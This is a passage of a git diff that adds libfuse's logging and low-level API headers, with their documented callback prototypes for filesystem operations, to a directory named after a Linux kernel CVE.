FUSE_LOG_CRIT, + FUSE_LOG_ERR, + FUSE_LOG_WARNING, + FUSE_LOG_NOTICE, + FUSE_LOG_INFO, + FUSE_LOG_DEBUG +}; + +/** + * Log message handler function. + * + * This function must be thread-safe. It may be called from any libfuse + * function, including fuse_parse_cmdline() and other functions invoked before + * a FUSE filesystem is created. + * + * Install a custom log message handler function using fuse_set_log_func(). 
+ * + * @param level log severity level + * @param fmt sprintf-style format string including newline + * @param ap format string arguments + */ +typedef void (*fuse_log_func_t)(enum fuse_log_level level, + const char *fmt, va_list ap); + +/** + * Install a custom log handler function. + * + * Log messages are emitted by libfuse functions to report errors and debug + * information. Messages are printed to stderr by default but this can be + * overridden by installing a custom log message handler function. + * + * The log message handler function is global and affects all FUSE filesystems + * created within this process. + * + * @param func a custom log message handler function or NULL to revert to + * the default + */ +void fuse_set_log_func(fuse_log_func_t func); + +/** + * Emit a log message + * + * @param level severity level (FUSE_LOG_ERR, FUSE_LOG_DEBUG, etc) + * @param fmt sprintf-style format string including newline + */ +void fuse_log(enum fuse_log_level level, const char *fmt, ...); + +#ifdef __cplusplus +} +#endif + +#endif /* FUSE_LOG_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_lowlevel.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_lowlevel.h new file mode 100644 index 0000000000000000000000000000000000000000..d73e9facc844c1718fefa4fe14c0274d45f309b2 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_lowlevel.h @@ -0,0 +1,2100 @@ +/* + FUSE: Filesystem in Userspace + Copyright (C) 2001-2007 Miklos Szeredi + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +#ifndef FUSE_LOWLEVEL_H_ +#define FUSE_LOWLEVEL_H_ + +/** @file + * + * Low level API + * + * IMPORTANT: you should define FUSE_USE_VERSION before including this + * header. To use the newest API define it to 35 (recommended for any + * new application). 
+ */ + +#ifndef FUSE_USE_VERSION +#error FUSE_USE_VERSION not defined +#endif + +#include "fuse_common.h" + +#include +#include +#include +#include +#include +#include + +#ifdef __cplusplus +extern "C" { +#endif + +/* ----------------------------------------------------------- * + * Miscellaneous definitions * + * ----------------------------------------------------------- */ + +/** The node ID of the root inode */ +#define FUSE_ROOT_ID 1 + +/** Inode number type */ +typedef uint64_t fuse_ino_t; + +/** Request pointer type */ +typedef struct fuse_req *fuse_req_t; + +/** + * Session + * + * This provides hooks for processing requests, and exiting + */ +struct fuse_session; + +/** Directory entry parameters supplied to fuse_reply_entry() */ +struct fuse_entry_param { + /** Unique inode number + * + * In lookup, zero means negative entry (from version 2.5) + * Returning ENOENT also means negative entry, but by setting zero + * ino the kernel may cache negative entries for entry_timeout + * seconds. + */ + fuse_ino_t ino; + + /** Generation number for this entry. + * + * If the file system will be exported over NFS, the + * ino/generation pairs need to be unique over the file + * system's lifetime (rather than just the mount time). So if + * the file system reuses an inode after it has been deleted, + * it must assign a new, previously unused generation number + * to the inode at the same time. + * + */ + uint64_t generation; + + /** Inode attributes. + * + * Even if attr_timeout == 0, attr must be correct. For example, + * for open(), FUSE uses attr.st_size from lookup() to determine + * how many bytes to request. If this value is not correct, + * incorrect data will be returned. + */ + struct stat attr; + + /** Validity timeout (in seconds) for inode attributes. If + attributes only change as a result of requests that come + through the kernel, this should be set to a very large + value. */ + double attr_timeout; + + /** Validity timeout (in seconds) for the name. 
If directory + entries are changed/deleted only as a result of requests + that come through the kernel, this should be set to a very + large value. */ + double entry_timeout; +}; + +/** + * Additional context associated with requests. + * + * Note that the reported client uid, gid and pid may be zero in some + * situations. For example, if the FUSE file system is running in a + * PID or user namespace but then accessed from outside the namespace, + * there is no valid uid/pid/gid that could be reported. + */ +struct fuse_ctx { + /** User ID of the calling process */ + uid_t uid; + + /** Group ID of the calling process */ + gid_t gid; + + /** Thread ID of the calling process */ + pid_t pid; + + /** Umask of the calling process */ + mode_t umask; +}; + +struct fuse_forget_data { + fuse_ino_t ino; + uint64_t nlookup; +}; + +/* 'to_set' flags in setattr */ +#define FUSE_SET_ATTR_MODE (1 << 0) +#define FUSE_SET_ATTR_UID (1 << 1) +#define FUSE_SET_ATTR_GID (1 << 2) +#define FUSE_SET_ATTR_SIZE (1 << 3) +#define FUSE_SET_ATTR_ATIME (1 << 4) +#define FUSE_SET_ATTR_MTIME (1 << 5) +#define FUSE_SET_ATTR_ATIME_NOW (1 << 7) +#define FUSE_SET_ATTR_MTIME_NOW (1 << 8) +#define FUSE_SET_ATTR_CTIME (1 << 10) + +/* ----------------------------------------------------------- * + * Request methods and replies * + * ----------------------------------------------------------- */ + +/** + * Low level filesystem operations + * + * Most of the methods (with the exception of init and destroy) + * receive a request handle (fuse_req_t) as their first argument. + * This handle must be passed to one of the specified reply functions. + * + * This may be done inside the method invocation, or after the call + * has returned. The request handle is valid until one of the reply + * functions is called. + * + * Other pointer arguments (name, fuse_file_info, etc) are not valid + * after the call has returned, so if they are needed later, their + * contents have to be copied. 
+ * + * In general, all methods are expected to perform any necessary + * permission checking. However, a filesystem may delegate this task + * to the kernel by passing the `default_permissions` mount option to + * `fuse_session_new()`. In this case, methods will only be called if + * the kernel's permission check has succeeded. + * + * The filesystem sometimes needs to handle a return value of -ENOENT + * from the reply function, which means that the request was + * interrupted and the reply discarded. For example, if + * fuse_reply_open() returns -ENOENT, the release method for + * this file will not be called. + */ +struct fuse_lowlevel_ops { + /** + * Initialize filesystem + * + * This function is called when libfuse establishes + * communication with the FUSE kernel module. The file system + * should use this module to inspect and/or modify the + * connection parameters provided in the `conn` structure. + * + * Note that some parameters may be overwritten by options + * passed to fuse_session_new() which take precedence over the + * values set in this handler. + * + * There's no reply to this function + * + * @param userdata the user data passed to fuse_session_new() + */ + void (*init) (void *userdata, struct fuse_conn_info *conn); + + /** + * Clean up filesystem. + * + * Called on filesystem exit. When this method is called, the + * connection to the kernel may be gone already, so that eg. calls + * to fuse_lowlevel_notify_* will fail. + * + * There's no reply to this function + * + * @param userdata the user data passed to fuse_session_new() + */ + void (*destroy) (void *userdata); + + /** + * Look up a directory entry by name and get its attributes.
+ * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name the name to look up + */ + void (*lookup) (fuse_req_t req, fuse_ino_t parent, const char *name); + + /** + * Forget about an inode + * + * This function is called when the kernel removes an inode + * from its internal caches. + * + * The inode's lookup count increases by one for every call to + * fuse_reply_entry and fuse_reply_create. The nlookup parameter + * indicates by how much the lookup count should be decreased. + * + * Inodes with a non-zero lookup count may receive request from + * the kernel even after calls to unlink, rmdir or (when + * overwriting an existing file) rename. Filesystems must handle + * such requests properly and it is recommended to defer removal + * of the inode until the lookup count reaches zero. Calls to + * unlink, rmdir or rename will be followed closely by forget + * unless the file or directory is open, in which case the + * kernel issues forget only after the release or releasedir + * calls. + * + * Note that if a file system will be exported over NFS the + * inodes lifetime must extend even beyond forget. See the + * generation field in struct fuse_entry_param above. + * + * On unmount the lookup count for all inodes implicitly drops + * to zero. It is not guaranteed that the file system will + * receive corresponding forget messages for the affected + * inodes. + * + * Valid replies: + * fuse_reply_none + * + * @param req request handle + * @param ino the inode number + * @param nlookup the number of lookups to forget + */ + void (*forget) (fuse_req_t req, fuse_ino_t ino, uint64_t nlookup); + + /** + * Get file attributes. 
+ * + * If writeback caching is enabled, the kernel may have a + * better idea of a file's length than the FUSE file system + * (eg if there has been a write that extended the file size, + * but that has not yet been passed to the filesystem). + * + * In this case, the st_size value provided by the file system + * will be ignored. + * + * Valid replies: + * fuse_reply_attr + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi for future use, currently always NULL + */ + void (*getattr) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Set file attributes + * + * In the 'attr' argument only members indicated by the 'to_set' + * bitmask contain valid values. Other members contain undefined + * values. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits if the file + * size or owner is being changed. + * + * If the setattr was invoked from the ftruncate() system call + * under Linux kernel versions 2.6.15 or later, the fi->fh will + * contain the value set by the open method or will be undefined + * if the open method didn't set any value. Otherwise (not + * ftruncate call, or kernel version earlier than 2.6.15) the fi + * parameter will be NULL.
+ * + * Valid replies: + * fuse_reply_attr + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param attr the attributes + * @param to_set bit mask of attributes which should be set + * @param fi file information, or NULL + */ + void (*setattr) (fuse_req_t req, fuse_ino_t ino, struct stat *attr, + int to_set, struct fuse_file_info *fi); + + /** + * Read symbolic link + * + * Valid replies: + * fuse_reply_readlink + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + */ + void (*readlink) (fuse_req_t req, fuse_ino_t ino); + + /** + * Create file node + * + * Create a regular file, character device, block device, fifo or + * socket node. + * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to create + * @param mode file type and mode with which to create the new file + * @param rdev the device number (only valid if created file is a device) + */ + void (*mknod) (fuse_req_t req, fuse_ino_t parent, const char *name, + mode_t mode, dev_t rdev); + + /** + * Create a directory + * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to create + * @param mode with which to create the new file + */ + void (*mkdir) (fuse_req_t req, fuse_ino_t parent, const char *name, + mode_t mode); + + /** + * Remove a file + * + * If the file's inode's lookup count is non-zero, the file + * system is expected to postpone any removal of the inode + * until the lookup count reaches zero (see description of the + * forget function). 
+ * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to remove + */ + void (*unlink) (fuse_req_t req, fuse_ino_t parent, const char *name); + + /** + * Remove a directory + * + * If the directory's inode's lookup count is non-zero, the + * file system is expected to postpone any removal of the + * inode until the lookup count reaches zero (see description + * of the forget function). + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to remove + */ + void (*rmdir) (fuse_req_t req, fuse_ino_t parent, const char *name); + + /** + * Create a symbolic link + * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param link the contents of the symbolic link + * @param parent inode number of the parent directory + * @param name to create + */ + void (*symlink) (fuse_req_t req, const char *link, fuse_ino_t parent, + const char *name); + + /** Rename a file + * + * If the target exists it should be atomically replaced. If + * the target's inode's lookup count is non-zero, the file + * system is expected to postpone any removal of the inode + * until the lookup count reaches zero (see description of the + * forget function). + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EINVAL, i.e. all + * future rename requests will fail with EINVAL without being + * sent to the filesystem process. + * + * *flags* may be `RENAME_EXCHANGE` or `RENAME_NOREPLACE`. If + * RENAME_NOREPLACE is specified, the filesystem must not + * overwrite *newname* if it exists and return an error + * instead. If `RENAME_EXCHANGE` is specified, the filesystem + * must atomically exchange the two files, i.e. both must + * exist and neither may be deleted.
+ * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the old parent directory + * @param name old name + * @param newparent inode number of the new parent directory + * @param newname new name + */ + void (*rename) (fuse_req_t req, fuse_ino_t parent, const char *name, + fuse_ino_t newparent, const char *newname, + unsigned int flags); + + /** + * Create a hard link + * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param ino the old inode number + * @param newparent inode number of the new parent directory + * @param newname new name to create + */ + void (*link) (fuse_req_t req, fuse_ino_t ino, fuse_ino_t newparent, + const char *newname); + + /** + * Open a file + * + * Open flags are available in fi->flags. The following rules + * apply. + * + * - Creation (O_CREAT, O_EXCL, O_NOCTTY) flags will be + * filtered out / handled by the kernel. + * + * - Access modes (O_RDONLY, O_WRONLY, O_RDWR) should be used + * by the filesystem to check if the operation is + * permitted. If the ``-o default_permissions`` mount + * option is given, this check is already done by the + * kernel before calling open() and may thus be omitted by + * the filesystem. + * + * - When writeback caching is enabled, the kernel may send + * read requests even for files opened with O_WRONLY. The + * filesystem should be prepared to handle this. + * + * - When writeback caching is disabled, the filesystem is + * expected to properly handle the O_APPEND flag and ensure + * that each write is appending to the end of the file. + * + * - When writeback caching is enabled, the kernel will + * handle O_APPEND. However, unless all changes to the file + * come through the kernel this will not work reliably. The + * filesystem should thus either ignore the O_APPEND flag + * (and let the kernel handle it), or return an error + * (indicating that reliably O_APPEND is not available). 
+ * + * Filesystem may store an arbitrary file handle (pointer, + * index, etc) in fi->fh, and use this in all other file + * operations (read, write, flush, release, fsync). + * + * Filesystem may also implement stateless file I/O and not store + * anything in fi->fh. + * + * There are also some flags (direct_io, keep_cache) which the + * filesystem may set in fi, to change the way the file is opened. + * See fuse_file_info structure in <fuse_common.h> for more details. + * + * If this request is answered with an error code of ENOSYS + * and FUSE_CAP_NO_OPEN_SUPPORT is set in + * `fuse_conn_info.capable`, this is treated as success and + * future calls to open and release will also succeed without being + * sent to the filesystem process. + * + * Valid replies: + * fuse_reply_open + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + */ + void (*open) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Read data + * + * Read should send exactly the number of bytes requested except + * on EOF or error, otherwise the rest of the data will be + * substituted with zeroes. An exception to this is when the file + * has been opened in 'direct_io' mode, in which case the return + * value of the read system call will reflect the return value of + * this operation. + * + * fi->fh will contain the value set by the open method, or will + * be undefined if the open method didn't set any value. + * + * Valid replies: + * fuse_reply_buf + * fuse_reply_iov + * fuse_reply_data + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param size number of bytes to read + * @param off offset to read from + * @param fi file information + */ + void (*read) (fuse_req_t req, fuse_ino_t ino, size_t size, off_t off, + struct fuse_file_info *fi); + + /** + * Write data + * + * Write should return exactly the number of bytes requested + * except on error.
An exception to this is when the file has + * been opened in 'direct_io' mode, in which case the return value + * of the write system call will reflect the return value of this + * operation. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + * + * fi->fh will contain the value set by the open method, or will + * be undefined if the open method didn't set any value. + * + * Valid replies: + * fuse_reply_write + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param buf data to write + * @param size number of bytes to write + * @param off offset to write to + * @param fi file information + */ + void (*write) (fuse_req_t req, fuse_ino_t ino, const char *buf, + size_t size, off_t off, struct fuse_file_info *fi); + + /** + * Flush method + * + * This is called on each close() of the opened file. + * + * Since file descriptors can be duplicated (dup, dup2, fork), for + * one open call there may be many flush calls. + * + * Filesystems shouldn't assume that flush will always be called + * after some writes, or that it will be called at all. + * + * fi->fh will contain the value set by the open method, or will + * be undefined if the open method didn't set any value. + * + * NOTE: the name of the method is misleading, since (unlike + * fsync) the filesystem is not forced to flush pending writes. + * One reason to flush data is if the filesystem wants to return + * write errors during close. However, such use is non-portable + * because POSIX does not require [close] to wait for delayed I/O to + * complete. + * + * If the filesystem supports file locking operations (setlk, + * getlk) it should remove all locks belonging to 'fi->owner'. + * + * If this request is answered with an error code of ENOSYS, + * this is treated as success and future calls to flush() will + * succeed automatically without being sent to the filesystem + * process.
+ * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * + * [close]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/close.html + */ + void (*flush) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Release an open file + * + * Release is called when there are no more references to an open + * file: all file descriptors are closed and all memory mappings + * are unmapped. + * + * For every open call there will be exactly one release call (unless + * the filesystem is force-unmounted). + * + * The filesystem may reply with an error, but error values are + * not returned to close() or munmap() which triggered the + * release. + * + * fi->fh will contain the value set by the open method, or will + * be undefined if the open method didn't set any value. + * fi->flags will contain the same flags as for open. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + */ + void (*release) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Synchronize file contents + * + * If the datasync parameter is non-zero, then only the user data + * should be flushed, not the meta data. + * + * If this request is answered with an error code of ENOSYS, + * this is treated as success and future calls to fsync() will + * succeed automatically without being send to the filesystem + * process. 
+ * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param datasync flag indicating if only data should be flushed + * @param fi file information + */ + void (*fsync) (fuse_req_t req, fuse_ino_t ino, int datasync, + struct fuse_file_info *fi); + + /** + * Open a directory + * + * Filesystem may store an arbitrary file handle (pointer, index, + * etc) in fi->fh, and use this in all other directory + * stream operations (readdir, releasedir, fsyncdir). + * + * If this request is answered with an error code of ENOSYS and + * FUSE_CAP_NO_OPENDIR_SUPPORT is set in `fuse_conn_info.capable`, + * this is treated as success and future calls to opendir and + * releasedir will also succeed without being sent to the filesystem + * process. In addition, the kernel will cache readdir results + * as if opendir returned FOPEN_KEEP_CACHE | FOPEN_CACHE_DIR. + * + * Valid replies: + * fuse_reply_open + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + */ + void (*opendir) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Read directory + * + * Send a buffer filled using fuse_add_direntry(), with size not + * exceeding the requested size. Send an empty buffer on end of + * stream. + * + * fi->fh will contain the value set by the opendir method, or + * will be undefined if the opendir method didn't set any value. + * + * Returning a directory entry from readdir() does not affect + * its lookup count. + * + * If off_t is non-zero, then it will correspond to one of the off_t + * values that was previously returned by readdir() for the same + * directory handle. In this case, readdir() should skip over entries + * coming before the position defined by the off_t value.
If entries + * are added or removed while the directory handle is open, the filesystem + * may still include the entries that have been removed, and may not + * report the entries that have been created. However, addition or + * removal of entries must never cause readdir() to skip over unrelated + * entries or to report them more than once. This means + * that off_t can not be a simple index that enumerates the entries + * that have been returned but must contain sufficient information to + * uniquely determine the next directory entry to return even when the + * set of entries is changing. + * + * The function does not have to report the '.' and '..' + * entries, but is allowed to do so. Note that, if readdir does + * not return '.' or '..', they will not be implicitly returned, + * and this behavior is observable by the caller. + * + * Valid replies: + * fuse_reply_buf + * fuse_reply_data + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param size maximum number of bytes to send + * @param off offset to continue reading the directory stream + * @param fi file information + */ + void (*readdir) (fuse_req_t req, fuse_ino_t ino, size_t size, off_t off, + struct fuse_file_info *fi); + + /** + * Release an open directory + * + * For every opendir call there will be exactly one releasedir + * call (unless the filesystem is force-unmounted). + * + * fi->fh will contain the value set by the opendir method, or + * will be undefined if the opendir method didn't set any value. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + */ + void (*releasedir) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Synchronize directory contents + * + * If the datasync parameter is non-zero, then only the directory + * contents should be flushed, not the meta data. 
+ * + * fi->fh will contain the value set by the opendir method, or + * will be undefined if the opendir method didn't set any value. + * + * If this request is answered with an error code of ENOSYS, + * this is treated as success and future calls to fsyncdir() will + * succeed automatically without being send to the filesystem + * process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param datasync flag indicating if only data should be flushed + * @param fi file information + */ + void (*fsyncdir) (fuse_req_t req, fuse_ino_t ino, int datasync, + struct fuse_file_info *fi); + + /** + * Get file system statistics + * + * Valid replies: + * fuse_reply_statfs + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number, zero means "undefined" + */ + void (*statfs) (fuse_req_t req, fuse_ino_t ino); + + /** + * Set an extended attribute + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future setxattr() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. + * + * Valid replies: + * fuse_reply_err + */ + void (*setxattr) (fuse_req_t req, fuse_ino_t ino, const char *name, + const char *value, size_t size, int flags); + + /** + * Get an extended attribute + * + * If size is zero, the size of the value should be sent with + * fuse_reply_xattr. + * + * If the size is non-zero, and the value fits in the buffer, the + * value should be sent with fuse_reply_buf. + * + * If the size is too small for the value, the ERANGE error should + * be sent. + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future getxattr() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. 
+ * + * Valid replies: + * fuse_reply_buf + * fuse_reply_data + * fuse_reply_xattr + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param name of the extended attribute + * @param size maximum size of the value to send + */ + void (*getxattr) (fuse_req_t req, fuse_ino_t ino, const char *name, + size_t size); + + /** + * List extended attribute names + * + * If size is zero, the total size of the attribute list should be + * sent with fuse_reply_xattr. + * + * If the size is non-zero, and the null character separated + * attribute list fits in the buffer, the list should be sent with + * fuse_reply_buf. + * + * If the size is too small for the list, the ERANGE error should + * be sent. + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future listxattr() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. + * + * Valid replies: + * fuse_reply_buf + * fuse_reply_data + * fuse_reply_xattr + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param size maximum size of the list to send + */ + void (*listxattr) (fuse_req_t req, fuse_ino_t ino, size_t size); + + /** + * Remove an extended attribute + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future removexattr() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param name of the extended attribute + */ + void (*removexattr) (fuse_req_t req, fuse_ino_t ino, const char *name); + + /** + * Check file access permissions + * + * This will be called for the access() and chdir() system + * calls. 
If the 'default_permissions' mount option is given, + * this method is not called. + * + * This method is not called under Linux kernel versions 2.4.x + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent success, i.e. this and all future access() + * requests will succeed without being send to the filesystem process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param mask requested access mode + */ + void (*access) (fuse_req_t req, fuse_ino_t ino, int mask); + + /** + * Create and open a file + * + * If the file does not exist, first create it with the specified + * mode, and then open it. + * + * See the description of the open handler for more + * information. + * + * If this method is not implemented or under Linux kernel + * versions earlier than 2.6.15, the mknod() and open() methods + * will be called instead. + * + * If this request is answered with an error code of ENOSYS, the handler + * is treated as not implemented (i.e., for this and future requests the + * mknod() and open() handlers will be called instead). 
+ * + * Valid replies: + * fuse_reply_create + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to create + * @param mode file type and mode with which to create the new file + * @param fi file information + */ + void (*create) (fuse_req_t req, fuse_ino_t parent, const char *name, + mode_t mode, struct fuse_file_info *fi); + + /** + * Test for a POSIX file lock + * + * Valid replies: + * fuse_reply_lock + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * @param lock the region/type to test + */ + void (*getlk) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi, struct flock *lock); + + /** + * Acquire, modify or release a POSIX file lock + * + * For POSIX threads (NPTL) there's a 1-1 relation between pid and + * owner, but otherwise this is not always the case. For checking + * lock ownership, 'fi->owner' must be used. The l_pid field in + * 'struct flock' should only be used to fill in this field in + * getlk(). + * + * Note: if the locking methods are not implemented, the kernel + * will still allow file locking to work locally. Hence these are + * only interesting for network filesystems and similar. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * @param lock the region/type to set + * @param sleep locking operation may sleep + */ + void (*setlk) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi, + struct flock *lock, int sleep); + + /** + * Map block index within file to block index within device + * + * Note: This makes sense only for block device backed filesystems + * mounted with the 'blkdev' option + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure, i.e. 
all future bmap() requests will + * fail with the same error code without being send to the filesystem + * process. + * + * Valid replies: + * fuse_reply_bmap + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param blocksize unit of block index + * @param idx block index within file + */ + void (*bmap) (fuse_req_t req, fuse_ino_t ino, size_t blocksize, + uint64_t idx); + +#if FUSE_USE_VERSION < 35 + void (*ioctl) (fuse_req_t req, fuse_ino_t ino, int cmd, + void *arg, struct fuse_file_info *fi, unsigned flags, + const void *in_buf, size_t in_bufsz, size_t out_bufsz); +#else + /** + * Ioctl + * + * Note: For unrestricted ioctls (not allowed for FUSE + * servers), data in and out areas can be discovered by giving + * iovs and setting FUSE_IOCTL_RETRY in *flags*. For + * restricted ioctls, kernel prepares in/out data area + * according to the information encoded in cmd. + * + * Valid replies: + * fuse_reply_ioctl_retry + * fuse_reply_ioctl + * fuse_reply_ioctl_iov + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param cmd ioctl command + * @param arg ioctl argument + * @param fi file information + * @param flags for FUSE_IOCTL_* flags + * @param in_buf data fetched from the caller + * @param in_bufsz number of fetched bytes + * @param out_bufsz maximum size of output data + * + * Note : the unsigned long request submitted by the application + * is truncated to 32 bits. + */ + void (*ioctl) (fuse_req_t req, fuse_ino_t ino, unsigned int cmd, + void *arg, struct fuse_file_info *fi, unsigned flags, + const void *in_buf, size_t in_bufsz, size_t out_bufsz); +#endif + + /** + * Poll for IO readiness + * + * Note: If ph is non-NULL, the client should notify + * when IO readiness events occur by calling + * fuse_lowlevel_notify_poll() with the specified ph. + * + * Regardless of the number of times poll with a non-NULL ph + * is received, single notification is enough to clear all. 
+ * Notifying more times incurs overhead but doesn't harm + * correctness. + * + * The callee is responsible for destroying ph with + * fuse_pollhandle_destroy() when no longer in use. + * + * If this request is answered with an error code of ENOSYS, this is + * treated as success (with a kernel-defined default poll-mask) and + * future calls to poll() will succeed the same way without being sent + * to the filesystem process. + * + * Valid replies: + * fuse_reply_poll + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * @param ph poll handle to be used for notification + */ + void (*poll) (fuse_req_t req, fuse_ino_t ino, struct fuse_file_info *fi, + struct fuse_pollhandle *ph); + + /** + * Write data made available in a buffer + * + * This is a more generic version of the ->write() method. If + * FUSE_CAP_SPLICE_READ is set in fuse_conn_info.want and the + * kernel supports splicing from the fuse device, then the + * data will be made available in pipe for supporting zero + * copy data transfer. + * + * buf->count is guaranteed to be one (and thus buf->idx is + * always zero). The write_buf handler must ensure that + * bufv->off is correctly updated (reflecting the number of + * bytes read from bufv->buf[0]). + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits.
+ * + * Valid replies: + * fuse_reply_write + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param bufv buffer containing the data + * @param off offset to write to + * @param fi file information + */ + void (*write_buf) (fuse_req_t req, fuse_ino_t ino, + struct fuse_bufvec *bufv, off_t off, + struct fuse_file_info *fi); + + /** + * Callback function for the retrieve request + * + * Valid replies: + * fuse_reply_none + * + * @param req request handle + * @param cookie user data supplied to fuse_lowlevel_notify_retrieve() + * @param ino the inode number supplied to fuse_lowlevel_notify_retrieve() + * @param offset the offset supplied to fuse_lowlevel_notify_retrieve() + * @param bufv the buffer containing the returned data + */ + void (*retrieve_reply) (fuse_req_t req, void *cookie, fuse_ino_t ino, + off_t offset, struct fuse_bufvec *bufv); + + /** + * Forget about multiple inodes + * + * See description of the forget function for more + * information. + * + * Valid replies: + * fuse_reply_none + * + * @param req request handle + */ + void (*forget_multi) (fuse_req_t req, size_t count, + struct fuse_forget_data *forgets); + + /** + * Acquire, modify or release a BSD file lock + * + * Note: if the locking methods are not implemented, the kernel + * will still allow file locking to work locally. Hence these are + * only interesting for network filesystems and similar. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * @param op the locking operation, see flock(2) + */ + void (*flock) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi, int op); + + /** + * Allocate requested space. If this function returns success then + * subsequent writes to the specified range shall not fail due to the lack + * of free space on the file system storage media. 
+ * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future fallocate() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param offset starting point for allocated region + * @param length size of allocated region + * @param mode determines the operation to be performed on the given range, + * see fallocate(2) + */ + void (*fallocate) (fuse_req_t req, fuse_ino_t ino, int mode, + off_t offset, off_t length, struct fuse_file_info *fi); + + /** + * Read directory with attributes + * + * Send a buffer filled using fuse_add_direntry_plus(), with size not + * exceeding the requested size. Send an empty buffer on end of + * stream. + * + * fi->fh will contain the value set by the opendir method, or + * will be undefined if the opendir method didn't set any value. + * + * In contrast to readdir() (which does not affect the lookup counts), + * the lookup count of every entry returned by readdirplus(), except "." + * and "..", is incremented by one. + * + * Valid replies: + * fuse_reply_buf + * fuse_reply_data + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param size maximum number of bytes to send + * @param off offset to continue reading the directory stream + * @param fi file information + */ + void (*readdirplus) (fuse_req_t req, fuse_ino_t ino, size_t size, off_t off, + struct fuse_file_info *fi); + + /** + * Copy a range of data from one file to another + * + * Performs an optimized copy between two file descriptors without the + * additional cost of transferring data through the FUSE kernel module + * to user space (glibc) and then back into the FUSE filesystem again. 
